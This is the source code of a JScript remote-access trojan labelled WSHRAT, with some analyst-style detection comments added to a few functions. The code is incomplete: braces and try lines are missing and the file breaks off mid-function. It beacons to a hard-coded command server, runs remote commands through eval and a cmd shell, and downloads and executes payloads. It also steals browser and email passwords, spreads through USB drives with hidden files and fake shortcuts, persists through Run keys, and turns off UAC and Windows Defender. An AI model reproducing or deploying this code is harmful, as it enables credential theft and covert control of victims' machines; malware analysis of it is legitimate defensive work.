//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>
//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
var host = "chongmei33.publicvm.com";
var port = 7045;
var installdir = "%temp%";
var runAsAdmin = false;
var lnkfile = true;
var lnkfolder = true;
if(runAsAdmin == true){
startupElevate();
if(WScript.Arguments.Named.Exists("elevated") == true){
disableSecurity();
//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
var shellobj = WScript.createObject("wscript.shell");
var filesystemobj = WScript.createObject("scripting.filesystemobject");
var httpobj = WScript.createObject("msxml2.xmlhttp");
//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
var installname = WScript.scriptName;
var startup = shellobj.specialFolders("startup") + "\\";
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}
var spliter = "|";
var sdkpath = installdir + "wshsdk";
var sdkfile = sdkpath + "\\" + chr(112) + chr(121) + chr(116) + chr(104) + chr(111) + chr(110) + chr(46) + chr(101) + chr(120) + chr(101);
var sleep = 5000;
var response, cmd, param, oneonce;
var inf = "";
var usbspreading = "";
var startdate = "";
//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
instance();
if(getBinder() != null){
runBinder();
while(true){
install();
response = "";
response = post ("is-ready","");
cmd = response.split(spliter);
switch(cmd[0]){
case "disconnect":
WScript.quit();
break;
case "reboot":
shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);
break;
case "shutdown":
shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);
break;
case "excecute":
param = cmd[1];
eval(param);
break;
case "install-sdk":
if (filesystemobj.fileExists(sdkfile)){
updatestatus("SDK+Already+Installed");
}else{
installsdk();
break;
case "get-pass":
passgrabber(cmd[1], "cmdc.exe", cmd[2]);
break;
case "get-pass-offline":
if (filesystemobj.fileExists(sdkfile)){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
else{
updatestatus("Installing+SDK");
var stat = installsdk();
if(stat == true){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
var msg = shellobj.ExpandEnvironmentStrings("%computername%") + "/" + shellobj.ExpandEnvironmentStrings("%username%");
post("show-toast", "Unable to automatically recover password for " + msg + " as the Password Recovery SDK cannot be automatically installed. You can try again manually.");
break;
case "update":
param = response.substr(response.indexOf("|") + 1);
oneonce.close();
oneonce = filesystemobj.openTextFile(installdir + installname ,2, false);
oneonce.write(param);
oneonce.close();
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
WScript.quit();
case "uninstall":
uninstall();
break;
case "up-n-exec":
download(cmd[1],cmd[2]);
break;
case "bring-log":
upload(installdir + "wshlogs\\" + cmd[1], "take-log");
break;
case "down-n-exec":
sitedownloader(cmd[1],cmd[2]);
break;
case "filemanager":
servicestarter(cmd[1], "fm-plugin.exe", information());
break;
case "rdp":
keyloggerstarter(cmd[1], "rd-plugin.exe", information(), "", true);
break;
case "rev-proxy":
reverseproxy("rprox.exe", cmd[1]);
break;
case "exit-proxy":
shellobj.run("%comspec% /c taskkill /F /IM rprox.exe", 0, true);
break;
case "keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0, false);
break;
case "offline-keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1, false);
break;
case "browse-logs":
post("is-logs", enumfaf(installdir + "wshlogs"));
break;
case "cmd-shell":
param = cmd[1];
post("is-cmd-shell",cmdshell(param));
break;
case "get-processes":
post("is-processes", enumprocess());
break;
case "disable-uac":
disableSecurity();
updatestatus("UAC+Disabled+(Reboot+Required)");
break;
case "check-eligible":
if(filesystemobj.fileExists(cmd[1])){
updatestatus("Is+Eligible");
}else{
updatestatus("Not+Eligible");
break;
case "force-eligible":
if(WScript.Arguments.Named.Exists("elevated") == true){
if(filesystemobj.folderExists(cmd[1])){
shellobj.run("%comspec% /c " + cmd[2], 0, true);
updatestatus("SUCCESS");
}else{
updatestatus("Component+Missing");
else{
updatestatus("Elevation+Required");
break;
case "elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
oneonce.close();
oneonce = null;
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
updatestatus("Client+Elevated");
}catch(nn){
WScript.quit();
else{
updatestatus("Client+Elevated");
break;
case "if-elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
updatestatus("Client+Not+Elevated");
else{
updatestatus("Client+Elevated");
break;
case "kill-process":
exitprocess(cmd[1]);
break;
case "sleep":
param = cmd[1];
sleep = eval(param);
break;
}catch(er){}
WScript.sleep(sleep);
function installsdk(){
var success = false;
var sdkurl = post("moz-sdk", "");
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", sdkurl, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
filesystemobj.deleteFile(installdir + "wshsdk.zip");
if (objhttpdownload.status == 200){
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "wshsdk.zip");
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
//unzip the file
UnZip(installdir + "wshsdk.zip", sdkpath);
success = true;
updatestatus("SDK+Installed");
}catch(err){
return success;
return success;
function install(){
var lnkobj;
var filename;
var foldername;
var fileicon;
var foldericon;
upstart();
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
filesystemobj.copyFile(WScript.scriptFullName , drive.path + "\\" + installname,true);
if (filesystemobj.fileExists (drive.path + "\\" + installname)){
filesystemobj.getFile(drive.path + "\\" + installname).attributes = 2+4;
}catch(eiju){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (lnkfile == false){break;}
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 2+4;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start " + file.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
try{fileicon = shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.split(".")[file.name.split(".").length - 1]+ "\\") + "\\defaulticon\\"); }catch(eeee){}
if (fileicon.indexOf(",") == 0){
lnkobj.iconLocation = file.path;
}else {
lnkobj.iconLocation = fileicon;
}
lnkobj.save();
}
}
}
}catch(err){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
if (lnkfolder == false){break;}
folder.attributes = 2+4;
foldername = folder.name;
lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
if (foldericon.indexOf(",") == 0){
lnkobj.iconLocation = folder.path;
}else {
lnkobj.iconLocation = foldericon;
}
lnkobj.save();
}catch(err){}
function startupElevate(){
if(WScript.Arguments.Named.Exists("elevated") == false){
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
}catch(nn){
WScript.quit();
// Tampers with UAC and Windows Defender policy through the WMI registry provider.
// Only acts when the script was relaunched with the /elevated switch (see startupElevate);
// the main loop reports "UAC+Disabled+(Reboot+Required)" after calling it, so the author
// expects the change to take effect at next logon/boot.
// Detection/mitigation: DWORD writes by a wscript.exe process to
//   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (EnableLUA=0,
//   ConsentPromptBehaviorAdmin=0) and
//   HKLM\SOFTWARE\Policies\Microsoft\Windows Defender (DisableAntiSpyware=1)
// are high-value registry-audit events; Defender tamper protection, where enabled,
// is expected to ignore the DisableAntiSpyware policy — confirm for the target build.
// Closing braces for this function are not present in this listing.
function disableSecurity(){
if(WScript.Arguments.Named.Exists("elevated") == true){
// StdRegProv; 0x80000002 is the HKEY_LOCAL_MACHINE hive constant.
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","ConsentPromptBehaviorAdmin", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Policies\\Microsoft\\Windows Defender","DisableAntiSpyware", 1);
oReg = null;
function uninstall(){
var filename;
var foldername;
shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
}catch(ei){}
filesystemobj.deleteFile(startup + installname ,true);
filesystemobj.deleteFile(WScript.scriptFullName ,true);
}catch(eej){}
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 0;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk" );
}else{
filesystemobj.deleteFile(drive.path + "\\" + file.name);
}
}else{
filesystemobj.deleteFile (file.path);
}
}
}catch(ex){}
}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
folder.attributes = 0;
}
}catch(err){}
WScript.quit();
// C2 transport. Synchronous HTTP POST to http://<host>:<port>/<cmd> with `param` as the
// body; the victim fingerprint built by information() is carried in the request's
// user-agent header (note the header-name literal includes a trailing colon).
// Returns the response text, or "" on any error — an empty response makes the main
// loop's switch on cmd[0] match no case, so the client silently sleeps and retries.
// Detection: outbound HTTP to the hard-coded host/port with a user-agent beginning
// "WSHRAT|" (see information()); the "is-ready" beacon repeats every `sleep` ms.
// The try{ line pairing with the catch below is not present in this listing.
function post (cmd ,param){
httpobj.open("post","http://" + host + ":" + port +"/" + cmd, false);
httpobj.setRequestHeader("user-agent:",information());
httpobj.send(param);
return httpobj.responseText;
}catch(err){
return "";
function information(){
if (inf == ""){
inf = hwid() + spliter;
inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter ;
inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var os = root.ExecQuery ("select * from win32_operatingsystem");
for(var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()){
var osinfo = fi.item();
inf = inf + osinfo.caption + spliter;
break;
inf = inf + "plus" + spliter;
inf = inf + security() + spliter;
inf = inf + usbspreading;
inf = "WSHRAT" + spliter + inf + spliter + "JavaScript-v2.0" + spliter + getCountry();
return inf;
}else{
return inf;
}catch(err){
return "";
// Victim geolocation via a third-party service. GETs http://ip-api.com/json/ with a
// hard-coded Chrome user-agent, reads the body back through ADODB.Stream as us-ascii,
// and scrapes the "countryCode" and "country" fields by fixed character offsets past
// the key name rather than parsing JSON. Returns "<code>:<name>"; "01:Unknown" on a
// non-200 status or any error. The result is appended to the fingerprint in information().
// Detection: a wscript.exe process contacting ip-api.com is itself worth alerting on.
// The try{ line pairing with the final catch is not present in this listing.
function getCountry(){
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", "http://ip-api.com/json/", false);
objhttpdownload.setRequestHeader("user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36");
objhttpdownload.send();
if (objhttpdownload.status == 200){
// Binary stream (Type 1) to capture responseBody, then re-read as text (Type 2).
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var raw = objstreamdownload.ReadText();
var cc = "01";
var cn = "Unknown";
// Offset 14 = length of '"countryCode":"'; value runs to the next double quote.
try{
cc = raw.substr(raw.indexOf("countryCode") + 14);
cc = cc.substr(0, cc.indexOf("\""));
}catch(err){}
// Offset 10 = length of '"country":"'; indexOf("country") matches the first occurrence,
// so this depends on field order in the service's response — not validated here.
try{
cn = raw.substr(raw.indexOf("country") + 10);
cn = cn.substr(0, cn.indexOf("\""));
}catch(err){}
return cc + ":" + cn;
}else{
return "01:Unknown";
}catch(ex){
return "01:Unknown";
// Persistence. Registers a Run-key autostart in both HKCU and HKLM (value name = script
// base name; command = wscript.exe //B "<installdir>\<installname>"), then copies the
// running script to installdir and to the user's Startup folder. Called from install()
// on every main-loop iteration and from instance(), so the keys/files are re-created
// continuously. Failures are swallowed by the catch blocks; their try{ lines are not
// present in this listing.
// Detection: Run-key values whose command is wscript.exe //B pointing into %temp%, and
// script files appearing in the Startup folder.
function upstart (){
shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
}catch(ei){}
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
}catch(err){}
// Victim identifier. Queries WMI Win32_LogicalDisk and returns the volumeSerialNumber of
// the first disk whose serial is non-empty; "" if none is found or on error (the try{
// pairing with the catch below is not present in this listing). The break after return
// is unreachable. This value is the first field of the fingerprint built by information().
function hwid(){
var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var disks = root.ExecQuery ("select * from win32_logicaldisk");
for(var fi = new Enumerator(disks); !fi.atEnd(); fi.moveNext()){
var disk = fi.item();
if (disk.volumeSerialNumber != ""){
return disk.volumeSerialNumber;
break;
}catch(err){
return "";
function security(){
var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem",null,48);
var versionstr, osversion;
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
versionstr = objitem.version.toString().split(".");
//versionstr = colitems.version.split(".");
osversion = versionstr[0] + ".";
for (var x = 1; x < versionstr.length; x++){
osversion = osversion + versionstr[0];
osversion = eval(osversion);
var sc;
if (osversion > 6){ sc = "securitycenter2"; }else{ sc = "securitycenter";}
var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
var secu = "";
for(var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()){
var objantivirus = fi.item();
secu = secu + objantivirus.displayName + " .";
if(secu == ""){secu = "nan-av";}
return secu;
}catch(err){}
function getDate(){
var s = "";
var d = new Date();
s += d.getDate() + "/";
s += (d.getMonth() + 1) + "/";
s += d.getYear();
return s;
function instance(){
usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");
}catch(eee){}
if(usbspreading == ""){
if (WScript.scriptFullName.substr(1).toLowerCase() == ":\\" + installname.toLowerCase()){
usbspreading = "true - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
}else{
usbspreading = "false - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
upstart();
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
var installfullnameshort = filesystemobj.getFile(installdir + installname);
if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()){
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
WScript.quit();
oneonce = filesystemobj.openTextFile(installdir + installname ,8, false);
}catch(err){
WScript.quit();
function decode_base64(base64_string){
var yhm_pepe = WScript.CreateObject("ADODB.Stream");
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = base64_string;
yhm_pepe.Type = 1;
yhm_pepe.Open();
yhm_pepe.Write(spike.nodeTypedValue);
yhm_pepe.Position = 0;
yhm_pepe.Type = 2;
yhm_pepe.CharSet = "us-ascii";
return yhm_pepe.ReadText();
function decode_pass(retcmd){
var content, nss, command;
if(retcmd == "mozilla"){
command = "give-me-ffpv";
}else if(retcmd == "chrome"){
command = "give-me-chpv";
}else if(retcmd == "foxmail"){
command = "give-me-fm";
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post", "http://" + host + ":" + port +"/" + command, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
if(filesystemobj.fileExists(installdir + "rundll")){
filesystemobj.deleteFile(installdir + "rundll");
if (objhttpdownload.status == 200){
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
content = objstreamdownload.ReadText();
nss = sdkpath + "\\nss";
content = content.replace(new RegExp("%nss%", "g"), nss); //for firefox
content = content.replace(new RegExp("%path%", "g"), installdir + "Login Data"); //for chrome
var sw = filesystemobj.openTextFile(installdir + "rundll", 2, true);
sw.write(content);
sw.close();
sw = null;
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){}
shellobj.run("%comspec% /c cd \"" + sdkpath + "\" && " + gsp(sdkfile) + " " + gsp(installdir + "rundll") + " > \"" + installdir + "wshout\"", 0, true);
WScript.sleep(2000);
var sr = filesystemobj.openTextFile(installdir + "wshout");
content = sr.readall();
sr.close();
sr = null;
filesystemobj.deleteFile(installdir + "rundll");
filesystemobj.deleteFile(installdir + "wshout");
post(retcmd, content);
}catch(err){
function chr(code){
return String.fromCharCode(code);
function gsp(path){
return filesystemobj.getFile(path).shortPath;
function passgrabber (fileurl, filename, retcmd){
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
var content, profile, folder;
if (retcmd == "ie"){
content = decode_base64(fileurl);
eval(content);
return;
}else if(retcmd == "chrome"){
folder = shellobj.ExpandEnvironmentStrings("%temp%");
folder = folder.substr(0, folder.toLowerCase().indexOf("temp")) + "Google\\Chrome\\User Data\\Default\\Login Data";
if (objfsodownload.fileExists(folder) ){
objfsodownload.copyFile(folder, installdir + "Login Data", true);
if (objfsodownload.fileExists(sdkfile)){
//'proceed decoding
decode_pass(retcmd);
objfsodownload.deleteFile(installdir + "Login Data");
}else{
//'request for sdk
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else if(retcmd == "foxmail"){
if (objfsodownload.fileExists(sdkfile)){
//'proceed decoding
decode_pass(retcmd);
}else{
//'request for sdk
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else if(retcmd == "mozilla"){
folder = shellobj.ExpandEnvironmentStrings("%appdata%") + "\\Mozilla\\Firefox\\";
if (objfsodownload.fileExists (folder + "profiles.ini")){
content = filesystemobj.openTextFile(folder + "profiles.ini").readall();
if (content.indexOf("Path=") > 0) {
content = content.substr(content.indexOf("Path=") + 5);
content = content.substr(0, content.indexOf("\r\n"));
profile = (folder + content).replace(new RegExp("/", "g"), "\\");
folder = profile + "\logins.json";
if (objfsodownload.fileExists(sdkfile)){
//'proceed decoding
decode_pass(retcmd);
}else{
//'request for sdk
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else{
post(retcmd, "No Password Found");
}else{
passgrabber2(fileurl, filename, retcmd);
}catch(err){}
function UnZip(zipfile, ExtractTo){
if(filesystemobj.GetExtensionName(zipfile) == "zip"){
if(!filesystemobj.FolderExists(ExtractTo)){
filesystemobj.CreateFolder(ExtractTo);
var objShell = WScript.CreateObject("Shell.Application");
var destination = objShell.NameSpace(ExtractTo);
var zip_content = objShell.NameSpace(zipfile).Items();
for(i = 0; i < zip_content.Count; i++){
if(filesystemobj.FileExists(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))){
filesystemobj.DeleteFile(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path));
destination.copyHere(zip_content.item(i), 20);
function passgrabber2(fileurl, filename, retcmd){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
try{filesystemobj.deleteFile(installdir + filename + "data");}catch(ey){}
var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00\nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00\nSort=0";
//write config
var writer = filesystemobj.openTextFile(config_file, 2, true);
writer.writeLine(cfg);
writer.close();
writer = null;
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto)){
var runner = WScript.CreateObject("Shell.Application");
var saver = objfsodownload.getFile(strsaveto).shortPath
//try 10 times before giveup
for(var i=0; i<5; i++){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
WScript.sleep(1000);
runner.shellExecute(saver, " /stext " + saver + "data");
WScript.sleep(2000);
if(objfsodownload.fileExists(saver + "data")){
var sr = filesystemobj.openTextFile(saver + "data");
var buffer = sr.readall();
sr.close();
sr = null;
var outpath = installdir + "wshlogs\\recovered_password_email.log";
var folder = objfsodownload.GetParentFolderName(outpath);
if (!objfsodownload.FolderExists(folder))
shellobj.run("%comspec% /c mkdir \"" + folder + "\"", 0, true);
writer = filesystemobj.openTextFile(outpath, 2, true);
writer.write(buffer);
writer.close();
writer = null;
upload(saver + "data", retcmd);
break;
deletefaf(strsaveto);
function reverseproxy (filename, filearg){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strsaveto = installdir + filename;
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getReverseProxy());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " " + filearg );
function keyloggerstarter (fileurl, filename, filearg, is_offline, is_rdp){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strlink = fileurl;
var strsaveto = installdir + filename;
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
if(is_rdp == true){
objstreamdownload.Write(getRDP());
}else{
objstreamdownload.Write(getKeyLogger());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\" " + is_offline);
function servicestarter (fileurl, filename, filearg){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
}
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\"");
}
function sitedownloader (fileurl,filename){
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
}
function download (fileurl,filedir){
if(filedir == ""){
filedir = installdir;
strsaveto = filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","http://" + host + ":" + port +"/" + "send-to-me" + spliter + fileurl, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
}
// Reports a status string to the C2 as a POST to /update-status|<status_msg> (spliter is
// "|"); callers pre-encode spaces as "+". The victim fingerprint rides in the user-agent
// header, as in post(). Errors are swallowed by the catch below (its try{ line is not
// present in this listing). Detection: same beacon shape as post(), with the status text
// visible in the URL path.
function updatestatus(status_msg){
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
objsoc.open("post","http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
objsoc.setRequestHeader("user-agent:", information());
objsoc.send("");
}catch(err){}
function upload (fileurl, retcmd){
